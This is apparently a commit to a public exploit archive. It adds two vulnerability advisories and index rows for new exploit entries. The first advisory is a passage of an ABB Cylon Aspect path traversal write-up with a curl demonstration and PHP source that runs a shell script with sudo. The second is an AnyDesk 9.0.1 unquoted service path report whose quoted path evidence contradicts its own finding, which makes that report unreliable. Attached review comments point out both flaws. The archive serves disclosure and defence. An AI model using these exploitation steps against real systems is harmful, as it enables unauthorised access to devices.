Ethernet settings have been successfully updated.<br>Please supply MAC address below to your Network Administrator in order to determine new IP Address.<br><b>MAC Address: </b></p>
<iframe src="ethernetUpdateRun.php" style="visibility:hidden;"/>
</form>
<hr>
</body>
</html>
$ curl http://192.168.73.31/testingus.bak
ONBOOT=yes
DHCP=YES
IPADDR=192.168.73.31
NETMASK=255.255.255.0
GATEWAY=192.168.1.254
NETWORK=192.168.1.0
BROADCAST=192.168.1.255
DNS1=
DNS2=
$ cat -n /home/MIX_CMIX/htmlroot/ethernetUpdateRun.php
1 <?php
2 //---------Begin Authorization-------------
3 require_once 'validate/validateHeader.php';
4 //--------End Authorization----------------
5 include "lib/configParameter.php";
6 $lookupLog = "config/configfile";
7 $listFile = trim(obtainValue($lookupLog, "SHELL"));
8 $command = $listFile . "net.sh";
9 $sudo = trim(obtainValue($lookupLog, "SUDO"));
10 logWarning("Ethernet Settings modified");
11 exec($sudo . " " . $listFile . "net.sh");
12 exit();
13
14 ?>
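Review bot: The source listing at the end is `ethernetUpdateRun.php`, not `ethernetUpdate.php`, which the description names as the script handling the `devName` parameter, so the advisory does not show the path handling that is at fault. The demonstration also writes `testingus` and then fetches `testingus.bak`, which suggests the written file always receives a `.bak` suffix; the description's "arbitrary file paths" should say so, because it bounds the impact. Unlike the deployStart advisory in the same commit, this one has no CVE ID or CVE URL line, so the entry cannot be cross-referenced.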


@ -0,0 +1,32 @@
# Exploit Title: AnyDesk 9.0.1 - Unquoted Service Path
# Date: 2024-12-11
# Exploit Author: Parastou Razi
# Contact: razi.parastoo@gmail.com
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 9.0.1
# Tested on: Windows 11 x64
1. Description:
The Anydesk installs as a service with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc anydesk --service
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: anydesk
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
--service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AnyDesk Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
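Review bot: The `sc qc` output offered as proof shows `BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"` followed by `--service`, so the executable path is enclosed in double quotes, which contradicts the "unquoted service path" claim in the title and description. As captured, the evidence does not support the finding, unless the quotes were added in transcription. The author should paste the raw output from an affected install, or the entry should be corrected, so that defenders do not spend time on a condition the page does not demonstrate.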


@ -11592,6 +11592,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple,,2007-08-18,2013-12-27,1,CVE-2007-4446;OSVDB-39701,,,,,https://www.securityfocus.com/bid/25359/info
36238,exploits/multiple/remote/36238.txt,"Toshiba e-Studio (Multiple Devices) - Security Bypass",2011-10-17,"Deral Heiland PercX",remote,multiple,,2011-10-17,2015-03-03,1,CVE-2012-1239;OSVDB-81507,,,,,https://www.securityfocus.com/bid/50168/info
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,,2019-10-22,2019-10-22,1,CVE-2019-15954,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
52249,exploits/multiple/remote/52249.c,"TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption",2025-04-17,"Mohamed Maatallah",remote,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12344,,,,,
52250,exploits/multiple/remote/52250.txt,"TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)",2025-04-17,"Mohamed Maatallah",remote,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12342,,,,,
43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091,2018-01-17,2018-01-17,1,CVE-2018-5702,,,,,https://github.com/taviso/rbndr/tree/a189ffd9447ba78aa2702c5649d853b6fb612e3b
47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,,2019-07-24,2019-07-24,0,,,,,,
21339,exploits/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",remote,multiple,,2002-03-11,2012-09-17,1,CVE-2002-0440;OSVDB-6162,,,,,https://www.securityfocus.com/bid/4265/info
@ -11715,6 +11717,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49403,exploits/multiple/webapps/49403.txt,"Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting",2021-01-11,"Ramazan Mert GÖKTEN",webapps,multiple,,2021-01-11,2021-01-11,0,,,,,,
49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,,2021-01-21,2021-01-21,0,CVE-2020-23342,,,,,
47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,,2019-10-03,2019-10-03,0,CVE-2018-7251,,,,,
52253,exploits/multiple/webapps/52253.py,"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)",2025-04-17,"Ravindu Wickramasinghe",webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-42640,,,,,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,,
44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,,
@ -11799,6 +11802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15050,,,,,
33995,exploits/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",webapps,multiple,,2010-01-19,2014-07-07,1,,,,,,https://www.securityfocus.com/bid/40212/info
49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,,2021-04-13,2021-04-13,0,,,,,,
52256,exploits/multiple/webapps/52256.txt,"Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation",2025-04-17,"Kwangyun Keum",webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12955,,,,,
48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2019-16113,,,,,
51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",2022-09-20,"Akshay Ravi",webapps,multiple,,2022-09-20,2023-08-02,1,CVE-2022-2651,,,,,
9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",webapps,multiple,,2009-10-19,,1,CVE-2009-1479;OSVDB-59145,,,,,
@ -11852,6 +11856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,,2017-11-24,2017-11-27,0,CVE-2017-16962,,,,,
46408,exploits/multiple/webapps/46408.txt,"Comodo Dome Firewall 2.7.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,,2019-02-18,2019-02-18,0,,"Cross-Site Scripting (XSS)",,,,
48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,,2020-09-22,2020-09-22,0,CVE-2018-17431,,,,,
52257,exploits/multiple/webapps/52257.txt,"compop.ca 3.5.3 - Arbitrary code Execution",2025-04-17,dmlino,webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-48445,,,,,
43377,exploits/multiple/webapps/43377.txt,"Conarc iChannel - Improper Access Restrictions",2017-12-20,"Information Paradox",webapps,multiple,,2017-12-20,2017-12-21,0,CVE-2017-17759,,,,,
9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,webapps,multiple,,2009-02-24,,1,OSVDB-54551,"Metasploit Framework (MSF)",,,,
46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,,2019-05-10,2019-05-13,1,CVE-2019-7652,"Server-Side Request Forgery (SSRF)",,,,
@ -12424,6 +12429,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
52254,exploits/multiple/webapps/52254.py,"Usermin 2.100 - Username Enumeration",2025-04-17,Kjesper,webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-44762,,,,,
47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
43361,exploits/multiple/webapps/43361.md,"vBulletin 5.x - 'routestring' Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,,,,,,https://blogs.securiteam.com/index.php/archives/3569
@ -13053,7 +13059,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,,2021-04-27,2021-10-29,0,,,,,,
1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php,,2005-11-28,2016-06-13,1,OSVDB-21249;CVE-2005-3929,,,,http://www.exploit-db.comxaraya-1.0-core.zip,
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
52251,exploits/php/hardware/52251.txt,"ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution",2025-04-17,LiquidWorm,hardware,php,,2025-04-17,2025-04-17,0,CVE-2024-48840,,,,,
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
52252,exploits/php/hardware/52252.txt,"ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal",2025-04-17,LiquidWorm,hardware,php,,2025-04-17,2025-04-17,0,,,,,,
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
@ -39896,6 +39904,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,local,windows,,2016-09-22,2016-09-22,0,,,,,http://www.exploit-db.comAnyDesk.exe,
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,,2020-01-07,2020-01-07,0,,,,,,
51968,exploits/windows/local/51968.txt,"AnyDesk 7.0.15 - Unquoted Service Path",2024-04-08,"Milad karimi",local,windows,,2024-04-08,2024-04-08,0,,,,,,
52258,exploits/windows/local/52258.txt,"AnyDesk 9.0.1 - Unquoted Service Path",2025-04-17,"Parastou Razi",local,windows,,2025-04-17,2025-04-17,0,,,,,,
49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,,2021-02-09,2021-02-09,0,,,,,,
16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,OSVDB-107970,,,http://www.exploit-db.com/screenshots/idlt16500/16132.png,,
16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16133.png,,
